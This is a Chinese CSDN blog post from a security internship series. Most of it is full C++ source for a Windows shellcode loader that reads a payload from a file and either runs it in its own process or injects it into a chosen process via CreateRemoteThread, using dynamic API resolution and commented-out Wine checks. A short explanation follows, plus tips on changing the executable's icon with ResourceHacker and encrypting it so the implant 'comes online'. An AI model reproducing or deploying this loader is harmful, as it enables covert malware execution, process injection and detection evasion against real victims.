网络安全生产实习Day 5

最新推荐文章于 2024-08-15 21:46:18 发布
最新推荐文章于 2024-08-15 21:46:18 发布
阅读量490 收藏 3
点赞数 13
文章标签: cocoa macos objective-c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ynlazj/article/details/140498609
版权 
#include "myFunch.h"
//上线
//字符转宽字符
//加载shellcode
wchar_t* AtoW(char** a) {
    setlocale(LC_ALL, "");

    // 原始的char*字符串
    char* char_str = *a;

    // 确定所需的wchar_t缓冲区的大小
    size_t wchar_size = mbstowcs(NULL, char_str, 0) + 1;
    if (wchar_size == (size_t)-1) {
        perror("mbstowcs");
        return 0;
    }

    // 分配wchar_t缓冲区
    wchar_t* wchar_str = (wchar_t*)malloc(wchar_size * sizeof(wchar_t));
    if (wchar_str == NULL) {
        perror("malloc");
        return 0;
    }

    // 执行转换
    mbstowcs(wchar_str, char_str, wchar_size);
    return wchar_str;
}

//读取shellcode
char* ReadFile(SIZE_T* length, char* file) {
    char* filename = file;
    ifstream infile;
    infile.open(filename, ios::out | ios::binary);
    infile.seekg(0, infile.end);
    *length = infile.tellg();
    infile.seekg(0, infile.beg);
    char* data = new char[*length];
    if (infile.is_open()) {
        cout << "reading from the file" << endl;
        infile.read(data, *length);
    }
    return data;
}

//注入进程
void Inject(char* argv[]) {
    SIZE_T length = 0;
    char* data;
    data = ReadFile(&length, argv[2]);

    /*LPVOID mem = VirtualAlloc(NULL, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    RtlMoveMemory(mem, data, length);
    EnumChildWindows(NULL, (WNDENUMPROC)mem, NULL);*/

    HANDLE snapshot_handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);   //快照(留像)
    if (snapshot_handle != INVALID_HANDLE_VALUE) {
        // 枚举进程
        PROCESSENTRY32 process_entry;
        process_entry.dwSize = sizeof(PROCESSENTRY32);
        if (Process32First(snapshot_handle, &process_entry)) {
            do {
                // 将进程名转换为宽字符串
                std::wstring extFileName(process_entry.szExeFile);
                wchar_t* exename = AtoW(&argv[3]);
                // 如果进程名包含 "msedge.exe" 则进行以下操作  std::string::npos == 当初遍历的进程名
                if (extFileName.find(exename) != std::string::npos) {
                    // 打开进程
                    fn_OpenProcess myOpenProcess = (fn_OpenProcess)GetProcAddress(LoadLibraryA("kernel32.dll"), "OpenProcess");
                    HANDLE process_handle = myOpenProcess(PROCESS_ALL_ACCESS, FALSE, process_entry.th32ProcessID);
                    if (process_handle != NULL) {
                        // 在远程进程中分配内存
                        fn_VirtualAllocEx myVirtualAllocEx = (fn_VirtualAllocEx)GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAllocEx");
                        LPVOID remote_buffer = myVirtualAllocEx(process_handle, NULL, length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
                        if (remote_buffer != NULL) {
                            SIZE_T bytes_written;
                            // 将 code 写入远程进程内存
                            if (WriteProcessMemory(process_handle, remote_buffer, data, length, &bytes_written)) {
                                std::cout << "Remote buffer address: " << remote_buffer << std::endl;

                                // 在远程进程中创建线程执行 code
                                HANDLE remote_thread = CreateRemoteThread(process_handle, NULL, 0, (LPTHREAD_START_ROUTINE)remote_buffer, NULL, 0, NULL);
                                if (remote_thread != NULL) {
                                    // 等待线程结束
                                    WaitForSingleObject(remote_thread, INFINITE);
                                    CloseHandle(remote_thread);
                                }
                            }
                            // 关闭远程内存句柄
                            CloseHandle(remote_buffer);
                        }
                        // 关闭进程句柄
                        CloseHandle(process_handle);
                    }
                }
            } while (Process32Next(snapshot_handle, &process_entry)); // 继续枚举下一个进程
        }
        // 关闭进程快照句柄
        CloseHandle(snapshot_handle);
    }
}

//正常上线
VOID Normal(char* argv[]) {
    SIZE_T length = 0;
    char* data = NULL;
    data = ReadFile(&length, argv[2]);
    fn_VirtualAlloc myVirtualAlloc = (fn_VirtualAlloc)GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAlloc");
    fn_CreateThread myCreateThread = (fn_CreateThread)GetProcAddress(LoadLibraryA("kernel32.dll"), "CreateThread");

    LPVOID shell_addr = myVirtualAlloc(NULL, length, 0x00001000, 0x40);

    memcpy(shell_addr, data, length);
    HANDLE HThread = myCreateThread(0, 0, (LPTHREAD_START_ROUTINE)shell_addr, 0, 0, 0);
    fn_WaitForSingleObject myWaitForSingleObject = (fn_WaitForSingleObject)GetProcAddress(LoadLibraryA("kernel32.dll"), "WaitForSingleObject");
    myWaitForSingleObject(HThread, -1);

}
//LPVOID == Long Point VOID
//int Check_MulDiv_1() {
//    // Call MulDiv with specific arguments
//    int result = MulDiv(1, 0x80000000, 0x80000000);
//
//    // Check if the result matches the expected value
//    if (result != 2) {
//        std::cout << "MulDiv evasion method detected: Wine environment." << std::endl;
//    }
//    else {
//        std::cout << "MulDiv evasion method not detected." << std::endl;
//    }
//
//    return 0;
//}

//int Check_MulDiv_2() {
//    // Check for the existence of Wine's exclusive APIs
//    HMODULE hKernel32 = GetModuleHandle(L"kernel32.dll");
//    FARPROC wineGetUnixFileName = GetProcAddress(hKernel32, "wine_get_unix_file_name");
//    HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");
//    FARPROC wineGetHostVersion = GetProcAddress(hNtdll, "wine_get_host_version");
//
//    if (wineGetUnixFileName || wineGetHostVersion) {
//        std::cout << "Wine's exclusive APIs detected: Wine environment." << std::endl;
//    }
//    else {
//        std::cout << "Wine's exclusive APIs not detected." << std::endl;
//    }
//
//    return 0;
//}
// 远控的上线程序会变成你的注入目标程序
// User,管理员,System
// 主函数
int main(int argc, char* argv[]) {
    if (strcmp(argv[1], "-i") == 0) {
        if (argc == 4) {
            printf("Injecting!!!\n");
            Inject(argv);
        }
        else {
            wprintf(L"注入方式:-i 路径 进程名\n");
        }
    }
    if (strcmp(argv[1], "-d") == 0) {
        printf("adsf");
        Normal(argv);
    };
    if (strcmp(argv[1], "-h") == 0) {
        printf("-i Inject\n-h help\n-d normal\n");
    }
    /*printf("%d\n", argc);
    printf("%s", argv[1]);*/
    return 0;
}

这段代码是一个简单的远程控制工具的实现,主要功能包括文件读取、进程注入和普通程序执行三个部分。下面是每个函数的作用和特点的解释:

AtoW 函数

这个函数负责将普通的 char* 字符串转换成宽字符 wchar_t* 字符串。在这个代码中,主要用于将传入的进程名参数(char*)转换成宽字符格式,以便后续在进程枚举中比较进程名。

ReadFile 函数

这个函数用于读取文件内容,主要是读取指定路径下的二进制文件(例如 shellcode),并返回其内容和长度。它打开文件、计算文件大小、分配内存并读取数据,最后返回读取到的二进制数据的指针。

Inject 函数

这个函数实现了进程注入的功能。它首先通过创建进程快照(CreateToolhelp32Snapshot)来枚举系统中所有的进程,然后根据用户输入的进程名(宽字符格式)找到目标进程。如果找到匹配的进程,就尝试打开该进程、在其中分配内存、写入 shellcode,并通过创建远程线程来执行 shellcode。

Normal 函数

这个函数用于正常执行程序。它也是通过读取文件获取 shellcode,并使用 VirtualAlloc 分配内存,然后通过 CreateThread 在当前进程中执行 shellcode。

主函数 (main)

主函数根据命令行参数的不同调用上述不同的功能函数。支持的命令行参数包括 -i(进程注入)、-d(正常执行程序)和 -h(帮助信息)。根据参数的不同,输出相应的信息或执行对应的功能函数。

特点与安全性考虑

  • 功能全面:提供了远程注入和普通程序执行两种功能,可以根据用户的需要选择不同的操作。
  • 对操作系统依赖性:使用了 Windows 特定的系统调用和函数,限制了其在其他操作系统上的可移植性。
  • 安全性问题:这段代码中涉及到直接操作进程内存和执行 shellcode,如果不谨慎使用可能会导致系统安全问题,特别是在未经充分验证的 shellcode 使用上。

总体来说,这段代码展示了一个简单的远程控制工具的实现原理,但在实际使用中需要谨慎处理安全性和合法性问题。

正常上线:

ResourceHacker的使用(更改exe文件图标)

一、打开

二、将exe文件直接拖入软件

三、生成

最后可以使用工具进行加密

lusansui.
关注
  • 13
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
信息网络安全-网络攻防21
08-03
【信息网络安全-网络攻防21】主要涵盖了网络攻防中的关键知识点,这些知识点涉及到网络安全的多个层面,包括账户安全、钓鱼攻击、恶意代码、信息泄露、信息篡改、重放攻击、服务可用性以及利用各种技术进行的攻击。...
网络安全工程师(千峰教育)笔记
11-03
b站的千峰老师的网络安全工程师的系列课程的笔记,自己整理的,pdf版本,内容包含day2--------day24。
网络安全生产实习Day 4
ynlazj的博客
07-16 987
为了使Beacon能够快速响应渗透测试人员的操作,可以选中一个会话,单击右键,在弹出的快捷菜单中选择“Interact”选项,与被控制端进行交互。在Cobalt Strike主界面中选择一个Beacon,进入交互模式,执行“screenshot”命令,获得此刻目标主机当前用户的桌面截图,如图所示。单击右键,在弹出的快捷菜单中选择“Session”"“Sleep”选项,或者在Beacon命令行环境中执行如下命令,即可调用sleep命令。exit命令用来退出当前Beacon会话,相当于放弃这个会话的权限。
网络安全生产实习Day 3
ynlazj的博客
07-15 241
选中刚刚创建的连接,在右侧的主界面中点击 "连接" 按钮,FinalShell 将会尝试连接到服务器。打开 FinalShell 后,点击界面上的 "连接" 或 "快速连接",然后选择 "新建连接"。2.数据存储和备份: 提供安全可靠的数据存储空间,用于数据备份、文件存储和数据库管理等。5.安全性和备份: 提供安全的网络环境和备份机制,确保用户数据的安全和可靠性。如果是首次连接,可能会提示你接受服务器的 SSH 密钥,确认后即可连接。填写完连接信息后,点击 "确定" 或 "保存",保存连接设置。
网络安全生产实习Day 1
ynlazj的博客
07-13 969
代码技术应用在开发自动化的威胁情报收集工具和分析平台上,帮助安全团队快速获取和处理大量的威胁数据,以及识别与组织相关的威胁活动。2.多样化的话题和观点:会议涵盖了广泛的话题,从密码学到网络攻击和防御策略,每个话题都有不同的专家和研究者分享他们的见解。大部分深网内容是合法的,例如企业内部的信息、个人的私人数据存储等。网络的不同层面提供了多样化的服务和功能,同时也引发了关于信息访问、隐私保护和网络安全的许多辩论和挑战。4.启发和激励:与会的专家和同行分享他们的研究和经验,激发了我的学术热情和探索精神。
网络安全生产实习Day 2
ynlazj的博客
07-14 619
总的来说,学习 Windows API 的进程管理和指针操作,不仅增强了对操作系统底层机制的理解,也为开发高效、稳定和功能丰富的应用程序奠定了基础。1.声明和定义分离:头文件通常包含函数、类和变量的声明,而实际的实现则在相应的源文件(.cpp文件)中。头文件应该只包含必要的声明,具体的实现应该放在对应的源文件(.cpp 文件)中。内存管理:在使用指针时,需要注意内存的分配和释放。它们充当了代码模块之间的接口。通过遵循这些细节和最佳实践,可以帮助提高代码的可读性、可维护性,同时避免常见的编译问题和错误。
网络安全通告服务方案.docx
06-29
- 安全威胁通告:涵盖0-day攻击、系统漏洞和网络攻击的应对策略。 - 紧急通告:针对重大或突发情况发布,督促客户尽快修复漏洞。 6. 服务方式 以年度服务为基础,通过电子邮件定期发送安全通告,紧急情况下不定期...
下一代网络安全解决方案.doc
12-20
- 新型安全攻击方式,如0Day攻击和APT攻击,呈现快速增长,传统技术难以应对。 - 网络IP化、IPv6、云计算和物联网的发展带来了更复杂的安全问题。 - 运营商网络因规模庞大和安全薄弱点众多,常遭受攻击,且难以...
网络安全漏洞扫描服务方案.docx
06-29
网络安全漏洞扫描服务方案 网络安全是当今数字化社会的关键要素,而安全漏洞扫描服务是保障网络环境安全的重要手段。本文将深入探讨安全漏洞的概念、0-day攻击的威胁、漏洞扫描服务的发展趋势以及安全漏洞评估的两...
腾讯云COS和阿里云OSS在Springboot中的使用
qq_73440769的博客
08-12 359
引言:之前本来是用OSS做存储的,但是上线小程序发现OSS貌似消费比COS多一些,所以之前做了技术搬迁,最近想起,打算做个笔记记录一下,这里省去在阿里云注册OSS或腾讯云中注册COS应用了。
初识C++:开启C++之旅
LCL200356的博客
08-15 788
1.定义命名空间,需要使用到namespace关键字,后面跟命名空间的名字,然后接一对{}即可,{}中即为命名空间的成员。命名空间中可以定义变量、函数、类型等。2.namespace本质是定义出一个域,这个域跟全局域各自独立,不同的域可以定义同名变量,所以下面的rand就不在冲突了。//命名域将rand和函数rand隔开int data;int main()//这里访问的是rand函数指针//这里访问的时lcl命名空间中的randreturn 10;
如果忘记了 Apple ID 密码,如何重设
Geeker55的博客
08-15 706
“我忘记了我的 Apple ID 密码,如何恢复我的帐户?”为了方便用户,Apple 允许每个人使用唯一的 Apple ID 和密码激活设备并访问所有 Apple 服务。然而,实际上,手动选择某项并忘记它似乎很容易。例如,许多 Apple 用户报告说他们遇到了忘记密码的问题。因此,本指南告诉您忘记 Apple ID 密码时应该怎么做。
7.1 多态案例
weixin_45930573的博客
08-15 233
3.而多态实现方法则将加减分成不同的类,增加新功能不会影响到加减函数,并且某一功能 出现异常时可快速定位,增强代码维护性;2.但若要增加程序功能(如除法)或出现异常时,普通实现方法需要对result()进行修改;1.多态实现相对与普通方法代码量更大;
河南萌新联赛2024第(五)场:信息工程大学
2302_80423900的博客
08-15 266
Alice 和 Bob 在玩一个游戏,他们先从 2000.1.1 到 2024.8.1 这个日期之间(不包括2024.8.1)随意抽取一个日期出来。然后他们轮流对这个日期进行操作:把日期的天数加 1,例如:2000.1.1 变到 2000.1.2把月份加 1,例如:2000.1.1 变到 2000.2.1其中如果天数超过应有天数则日期变更到下个月的第 1 天。月份超过 12 则变到下一年的1月。
axios 封装避免重复请求(两种)
z001126的博客
08-13 1211
在当今的前端开发领域,数据交互是不可或缺的一环。Axios 作为一款基于 Promise 的 HTTP 客户端,因其简洁的 API 和丰富的配置选项,深受广大开发者的喜爱。然而,在实际项目中,我们常常会遇到一个问题:重复发送相同的请求,这不仅会浪费网络资源,还可能导致服务器压力增大。为了提高应用的性能和用户体验,我们需要对 Axios 进行封装,以避免重复请求的问题。本文将详细介绍两种封装 Axios 的方案,帮助您有效地避免重复请求,提升项目质量。
模拟实现简单栈和队列
2302_81226481的博客
08-15 205
stack作为容器适配器实在容器的基础上再进行封装,因此实现较为简单。
C++ 线程
gopher9511的博客
08-13 963
TOCTOC。
C++_2_nullptr关键字(3/3)
最新发布
2301_80682565的博客
08-15 187
本节内容有C的NULL在前面打头阵,学起来犹如探囊取物。先来分析一段代码,本段代码恰好也结合了上节的宏。分析:可以晓得,两个函数f构成函数重载。函数名都是f;参数不同:第一个函数形参类型int,第二个是int*;而第一句代码f(0),参数是int,自然调用第一个f函数,第二个函数参数为空指针,好家伙,指针类型,可以传第二个f。运行截图:好好,都调用的第一个函数,第二行f(NULL)为什么要调用第一个函数?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值